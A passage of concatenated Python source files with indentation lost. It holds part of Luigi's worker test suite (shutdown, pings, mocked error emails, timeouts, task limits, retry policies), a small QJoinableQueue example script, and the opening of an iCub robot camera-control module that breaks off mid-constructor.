@with_config({"worker": {"no_install_shutdown_handler": "True"}})
def test_can_run_luigi_in_thread(self):
class A(DummyTask):
pass
task = A()
# Note that ``signal.signal(signal.SIGUSR1, fn)`` can only be called in the main thread.
# So if we do not disable the shutdown handler, this would fail.
t = threading.Thread(target=lambda: luigi.build([task], local_scheduler=True))
t.start()
t.join()
self.assertTrue(task.complete())
class WorkerDisabledTest(LuigiTestCase):
def make_sch(self):
return Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
def _test_stop_getting_new_work_build(self, sch, worker):
"""
I got motivated to create this test case when I saw that the
execution_summary crashed after my first attemted solution.
"""
class KillWorkerTask(luigi.Task):
did_actually_run = False
def run(self):
sch.disable_worker('my_worker_id')
KillWorkerTask.did_actually_run = True
class Factory(object):
def create_local_scheduler(self, *args, **kwargs):
return sch
def create_worker(self, *args, **kwargs):
return worker
luigi.build([KillWorkerTask()], worker_scheduler_factory=Factory(), local_scheduler=True)
self.assertTrue(KillWorkerTask.did_actually_run)
def _test_stop_getting_new_work_manual(self, sch, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
sch.disable_worker('my_worker_id')
worker.run() # Note: Test could fail by hanging on this line
self.assertFalse(d.complete())
def _test_stop_getting_new_work(self, **worker_kwargs):
worker_kwargs['worker_id'] = 'my_worker_id'
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_manual(sch, Worker(**worker_kwargs))
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_build(sch, Worker(**worker_kwargs))
def test_stop_getting_new_work_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=False)
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(keep_alive=False, assistant=True)
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=True)
class DynamicDependenciesTest(unittest.TestCase):
n_workers = 1
timeout = float('inf')
def setUp(self):
self.p = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.p)
def test_dynamic_dependencies(self, use_banana_task=False):
t0 = time.time()
t = DynamicRequires(p=self.p, use_banana_task=use_banana_task)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
# loop through output and verify
with t.output().open('r') as f:
for i in range(7):
self.assertEqual(f.readline().strip(), '%d: Done!' % i)
self.assertTrue(time.time() - t0 < self.timeout)
def test_dynamic_dependencies_with_namespace(self):
self.test_dynamic_dependencies(use_banana_task=True)
def test_dynamic_dependencies_other_module(self):
t = DynamicRequiresOtherModule(p=self.p)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
class DynamicDependenciesWithMultipleWorkersTest(DynamicDependenciesTest):
n_workers = 100
timeout = 3.0 # We run 7 tasks that take 0.5s each so it should take less than 3.5s
class WorkerPingThreadTests(unittest.TestCase):
def test_ping_retry(self):
""" Worker ping fails once. Ping continues to try to connect to scheduler
Kind of ugly since it uses actual timing with sleep to test the thread
"""
sch = Scheduler(
retry_delay=100,
remove_delay=1000,
worker_disconnect_delay=10,
)
self._total_pings = 0 # class var so it can be accessed from fail_ping
def fail_ping(worker):
# this will be called from within keep-alive thread...
self._total_pings += 1
raise Exception("Some random exception")
sch.ping = fail_ping
with Worker(
scheduler=sch,
worker_id="foo",
ping_interval=0.01 # very short between pings to make test fast
):
# let the keep-alive thread run for a bit...
time.sleep(0.1) # yes, this is ugly but it's exactly what we need to test
self.assertTrue(
self._total_pings > 1,
msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
)
def test_ping_thread_shutdown(self):
with Worker(ping_interval=0.01) as w:
self.assertTrue(w._keep_alive_thread.is_alive())
self.assertFalse(w._keep_alive_thread.is_alive())
def email_patch(test_func, email_config=None):
EMAIL_CONFIG = {"core": {"error-email": "not-a-real-email-address-for-test-only"}, "email": {"force-send": "true"}}
if email_config is not None:
EMAIL_CONFIG.update(email_config)
emails = []
def mock_send_email(sender, recipients, msg):
emails.append(msg)
@with_config(EMAIL_CONFIG)
@functools.wraps(test_func)
@mock.patch('smtplib.SMTP')
def run_test(self, smtp):
smtp().sendmail.side_effect = mock_send_email
test_func(self, emails)
return run_test
def custom_email_patch(config):
return functools.partial(email_patch, email_config=config)
class WorkerEmailTest(LuigiTestCase):
def run(self, result=None):
super(WorkerEmailTest, self).setUp()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as self.worker:
super(WorkerEmailTest, self).run(result)
@email_patch
def test_connection_error(self, emails):
sch = RemoteScheduler('http://tld.invalid:1337', connect_timeout=1)
self.waits = 0
def dummy_wait():
self.waits += 1
sch._wait = dummy_wait
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
with Worker(scheduler=sch) as worker:
try:
worker.add(a)
except RPCError:
self.assertEqual(self.waits, 2) # should attempt to add it 3 times
self.assertNotEqual(emails, [])
self.assertTrue(emails[0].find("Luigi: Framework error while scheduling %s" % (a,)) != -1)
else:
self.fail()
@email_patch
def test_complete_error(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@email_patch
def test_requires_error(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertFalse(a.has_run)
@email_patch
def test_complete_return_value(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@email_patch
def test_run_error(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
a = A()
self.worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
@email_patch
def test_task_process_dies(self, emails):
a = SendSignalTask(signal.SIGKILL)
luigi.build([a], workers=2, local_scheduler=True)
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("died unexpectedly with exit code -9") != -1)
@email_patch
def test_task_times_out(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("timed out after 0.0001 seconds and was terminated.") != -1)
@with_config(dict(worker=dict(retry_external_tasks='true')))
@email_patch
def test_external_task_retries(self, emails):
"""
Test that we do not send error emails on the failures of external tasks
"""
class A(luigi.ExternalTask):
pass
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(emails, [])
@email_patch
def test_no_error(self, emails):
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertTrue(a.complete())
@custom_email_patch({"core": {"error-email": "not-a-real-email-address-for-test-only", 'email-type': 'none'}})
def test_disable_emails(self, emails):
class A(luigi.Task):
def complete(self):
raise Exception("b0rk")
self.worker.add(A())
self.assertEqual(emails, [])
class RaiseSystemExit(luigi.Task):
def run(self):
raise SystemExit("System exit!!")
class SendSignalTask(luigi.Task):
signal = luigi.IntParameter()
def run(self):
os.kill(os.getpid(), self.signal)
class HangTheWorkerTask(luigi.Task):
worker_timeout = luigi.IntParameter(default=None)
def run(self):
while True:
pass
def complete(self):
return False
class MultipleWorkersTest(unittest.TestCase):
@unittest.skip('Always skip. There are many intermittent failures')
# This pass under python3 when run as `nosetests test/worker_test.py`
# but not as `nosetests test`. Probably some side effect on previous tests
@unittest.skipIf(six.PY3, 'This test fail on python3 when run with tox.')
def test_multiple_workers(self):
# Test using multiple workers
# Also test generating classes dynamically since this may reflect issues with
# various platform and how multiprocessing is implemented. If it's using os.fork
# under the hood it should be fine, but dynamic classses can't be pickled, so
# other implementations of multiprocessing (using spawn etc) may fail
class MyDynamicTask(luigi.Task):
x = luigi.Parameter()
def run(self):
time.sleep(0.1)
t0 = time.time()
luigi.build([MyDynamicTask(i) for i in range(100)], workers=100, local_scheduler=True)
self.assertTrue(time.time() < t0 + 5.0) # should ideally take exactly 0.1s, but definitely less than 10.0
def test_zero_workers(self):
d = DummyTask()
luigi.build([d], workers=0, local_scheduler=True)
self.assertFalse(d.complete())
def test_system_exit(self):
# This would hang indefinitely before this fix:
# https://github.com/spotify/luigi/pull/439
luigi.build([RaiseSystemExit()], workers=2, local_scheduler=True)
def test_term_worker(self):
luigi.build([SendSignalTask(signal.SIGTERM)], workers=2, local_scheduler=True)
def test_kill_worker(self):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
def test_purge_multiple_workers(self):
w = Worker(worker_processes=2, wait_interval=0.01)
t1 = SendSignalTask(signal.SIGTERM)
t2 = SendSignalTask(signal.SIGKILL)
w.add(t1)
w.add(t2)
w._run_task(t1.task_id)
w._run_task(t2.task_id)
time.sleep(1.0)
w._handle_next_task()
w._handle_next_task()
w._handle_next_task()
def test_stop_worker_kills_subprocesses(self):
with Worker(worker_processes=2) as w:
hung_task = HangTheWorkerTask()
w.add(hung_task)
w._run_task(hung_task.task_id)
pids = [p.pid for p in w._running_tasks.values()]
self.assertEqual(1, len(pids))
pid = pids[0]
def is_running():
return pid in {p.pid for p in psutil.Process().children()}
self.assertTrue(is_running())
self.assertFalse(is_running())
def test_time_out_hung_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=2, local_scheduler=True)
def test_time_out_hung_single_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=1, local_scheduler=True)
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/72953986')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_default_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask()
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 5
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 6
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/76645264')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_override_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=10)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 10
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 11
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
class Dummy2Task(Task):
p = luigi.Parameter()
def output(self):
return MockTarget(self.p)
def run(self):
f = self.output().open('w')
f.write('test')
f.close()
class AssistantTest(unittest.TestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.assistant = Worker(scheduler=self.sch, worker_id='Y', assistant=True)
with Worker(scheduler=self.sch, worker_id='X') as w:
self.w = w
super(AssistantTest, self).run(result)
def test_get_work(self):
d = Dummy2Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assistant.run()
self.assertTrue(d.complete())
def test_bad_job_type(self):
class Dummy3Task(Dummy2Task):
task_family = 'UnknownTaskFamily'
d = Dummy3Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assertFalse(self.assistant.run())
self.assertFalse(d.complete())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [d.task_id])
def test_unimported_job_type(self):
MODULE_CONTENTS = b'''
import luigi
class UnimportedTask(luigi.Task):
def complete(self):
return False
'''
class NotImportedTask(luigi.Task):
task_family = 'UnimportedTask'
task_module = None
task = NotImportedTask()
# verify that it can't run the task without the module info necessary to import it
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
# check that it can import with the right module
with temporary_unloaded_module(MODULE_CONTENTS) as task.task_module:
self.w.add(task)
self.assertTrue(self.assistant.run())
self.assertEqual(list(self.sch.task_list('DONE', '').keys()), [task.task_id])
def test_unimported_job_sends_failure_message(self):
class NotInAssistantTask(luigi.Task):
task_family = 'Unknown'
task_module = None
task = NotInAssistantTask()
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
self.assertTrue(self.sch.fetch_error(task.task_id)['error'])
class ForkBombTask(luigi.Task):
depth = luigi.IntParameter()
breadth = luigi.IntParameter()
p = luigi.Parameter(default=(0, )) # ehm for some weird reason [0] becomes a tuple...?
def output(self):
return MockTarget('.'.join(map(str, self.p)))
def run(self):
with self.output().open('w') as f:
f.write('Done!')
def requires(self):
if len(self.p) < self.depth:
for i in range(self.breadth):
yield ForkBombTask(self.depth, self.breadth, self.p + (i, ))
class TaskLimitTest(unittest.TestCase):
def tearDown(self):
MockFileSystem().remove('')
@with_config({'core': {'worker-task-limit': '6'}})
def test_task_limit_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertFalse(t.complete())
leaf_tasks = [ForkBombTask(3, 2, branch) for branch in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1)]]
self.assertEqual(3, sum(t.complete() for t in leaf_tasks),
"should have gracefully completed as much as possible even though the single last leaf didn't get scheduled")
@with_config({'core': {'worker-task-limit': '7'}})
def test_task_limit_not_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
def test_no_task_limit(self):
w = Worker()
t = ForkBombTask(4, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
class WorkerConfigurationTest(unittest.TestCase):
def test_asserts_for_worker(self):
"""
Test that Worker() asserts that it's sanely configured
"""
Worker(wait_interval=1) # This shouldn't raise
self.assertRaises(AssertionError, Worker, wait_interval=0)
class WorkerWaitJitterTest(unittest.TestCase):
@with_config({'worker': {'wait_jitter': '10.0'}})
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter(self, mock_sleep, mock_random):
""" verify configured jitter amount """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 2.0
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(3.0)
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter_default(self, mock_sleep, mock_random):
""" verify default jitter is as expected """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 3.3
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(4.3)
class KeyboardInterruptBehaviorTest(LuigiTestCase):
def test_propagation_when_executing(self):
"""
Ensure that keyboard interrupts causes luigi to quit when you are
executing tasks.
TODO: Add a test that tests the multiprocessing (--worker >1) case
"""
class KeyboardInterruptTask(luigi.Task):
def run(self):
raise KeyboardInterrupt()
cmd = 'KeyboardInterruptTask --local-scheduler --no-lock'.split(' ')
self.assertRaises(KeyboardInterrupt, luigi_run, cmd)
def test_propagation_when_scheduling(self):
"""
Test that KeyboardInterrupt causes luigi to quit while scheduling.
"""
class KeyboardInterruptTask(luigi.Task):
def complete(self):
raise KeyboardInterrupt()
class ExternalKeyboardInterruptTask(luigi.ExternalTask):
def complete(self):
raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, luigi_run,
['KeyboardInterruptTask', '--local-scheduler', '--no-lock'])
self.assertRaises(KeyboardInterrupt, luigi_run,
['ExternalKeyboardInterruptTask', '--local-scheduler', '--no-lock'])
class WorkerPurgeEventHandlerTest(unittest.TestCase):
@mock.patch('luigi.worker.TaskProcess')
def test_process_killed_handler(self, task_proc):
result = []
@HangTheWorkerTask.event_handler(Event.PROCESS_FAILURE)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker()
task = HangTheWorkerTask()
task_process = mock.MagicMock(is_alive=lambda: False, exitcode=-14, task=task)
task_proc.return_value = task_process
w.add(task)
w._run_task(task.task_id)
w._handle_next_task()
self.assertEqual(result, [task])
@mock.patch('luigi.worker.time')
def test_timeout_handler(self, mock_time):
result = []
@HangTheWorkerTask.event_handler(Event.TIMEOUT)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=1)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 3
w._handle_next_task()
self.assertEqual(result, [task])
class PerTaskRetryPolicyBehaviorTest(LuigiTestCase):
def setUp(self):
super(PerTaskRetryPolicyBehaviorTest, self).setUp()
self.per_task_retry_count = 2
self.default_retry_count = 1
self.sch = Scheduler(retry_delay=0.1, retry_count=self.default_retry_count, prune_on_get_work=True)
def test_with_all_disabled_with_single_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires two another tasks (TestErrorTask1,TestErrorTask1) which both is failed, is
tested.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on single worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_all_disabled_with_multiple_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires two another tasks (TestErrorTask1,TestErrorTask1) which both is failed, is
tested.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e2))
self.assertTrue(w3.add(e1))
self.assertFalse(w3.run())
self.assertFalse(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_includes_success_with_single_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires one (TestErrorTask1) FAILED and one (TestSuccessTask1) SUCCESS, is tested.
Task TestSuccessTask1 will be DONE successfully, but Task TestErrorTask1 will be failed and it has retry_count at task level as 2.
This test is running on single worker
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_includes_success_with_multiple_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires one (TestErrorTask1) FAILED and one (TestSuccessTask1) SUCCESS, is tested.
Task TestSuccessTask1 will be DONE successfully, but Task TestErrorTask1 will be failed and it has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e1))
self.assertTrue(w3.add(s1))
self.assertTrue(w3.run())
self.assertFalse(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_single_worker(self):
"""
With this test, a case includes dependency tasks(TestErrorTask1,TestErrorTask2) which both are failed.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on single worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_multiple_workers(self):
"""
With this test, a case includes dependency tasks(TestErrorTask1,TestErrorTask2) which both are failed.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1) as w2:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(s1))
self.assertTrue(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
|
test_joinablequeue_simple_inverted.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# @autor: Ramón Invarato Menéndez
# @version 1.0
import multiprocessing
from quick_queue.quick_queue import QJoinableQueue
"""
Execute this script to see result in console
Add some values to QJoinableQueue
"""
def _process(qjq):
qjq.put("A")
qjq.put("B")
qjq.put("C")
print('All work completed')
qjq.join()
print('SubProcess completed')
if __name__ == "__main__":
qjq = QJoinableQueue()
p = multiprocessing.Process(target=_process, args=(qjq,))
p.start()
print(qjq.get())
qjq.task_done()
print(qjq.get())
qjq.task_done()
print(qjq.get())
qjq.task_done()
print('MainProcess completed')
|
icub.py
|
#!/usr/bin/python
# The MIT License (MIT)
#
# Copyright (c) 2017 Massimiliano Patacchiola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Command to lunch in simulation mode
# yarpserver
# ./iCub_SIM
# ./iKinGazeCtrl --from configSim.ini
# yarpdev --device opencv_grabber
# yarp connect /grabber /icubSim/texture/screen
#
# For the cartesian controller of the left arm
# ./simCartesianControl
# ./iKinCartesianSolver --context simCartesianControl --part left_arm
import numpy as np
import cv2
import time
import yarp
import acapela
import subprocess
import csv
from deepgaze.color_classification import HistogramColorClassifier
from deepgaze.color_detection import BackProjectionColorDetector
from deepgaze.motion_detection import MogMotionDetector
from deepgaze.mask_analysis import BinaryMaskAnalyser
import threading
import random
class iCub:
def __init__(self, icub_root='/icubSim'):
# Global variables
self.thread_movement_detection = threading.Thread(target=None)
self.acapela_account_login = ''
self.acapela_application_login = ''
self.acapela_application_password = ''
self.acapela_service_url = ''
# Deepgaze variables
self.object_list = list()
self.histogram_classifier = HistogramColorClassifier(channels=[0, 1, 2], hist_size=[128, 128, 128],
hist_range=[0, 256, 0, 256, 0, 256], hist_type='BGR')
# Init YARP
yarp.Network.init()
# Camera connection
try:
cam_w = 320 # 640
cam_h = 240 # 480
# Left camera
print("[ICUB] Init: Waiting for " + icub_root + "/cam/left' ...")
self.port_left_camera = yarp.Port()
self.port_left_camera.open("/pyera-left-image-port")
yarp.Network.connect(icub_root+"/cam/left", "/pyera-left-image-port")
# right camera
print("[ICUB] Init: Waiting for " + icub_root + "/cam/right' ...")
self.port_right_camera = yarp.Port()
self.port_right_camera.open("/pyera-right-image-port")
yarp.Network.connect(icub_root+"/cam/right", "/pyera-right-image-port")
# Set the numpy array to fill with the image
self.img_array = np.zeros((cam_h, cam_w, 3), dtype=np.uint8)
self.yarp_image = yarp.ImageRgb()
self.yarp_image.resize(cam_w, cam_h)
self.yarp_image.setExternal(self.img_array, self.img_array.shape[1], self.img_array.shape[0])
except BaseException, err:
print("[ICUB][ERROR] connect To Camera catching error " + str(err))
return
try:
if icub_root.find("Sim") > -1:
print("[ICUB] Simulation Mode, connecting grabber to texture/screen ")
# yarp connect /grabber /icubSim/texture/screen
yarp.Network.connect("/grabber", icub_root + "/texture/screen")
except BaseException, err:
print("[ICUB][ERROR] connecting /grabber to /texture/screen catching error " + str(err))
return
try:
self.port_ikin_mono = yarp.Port()
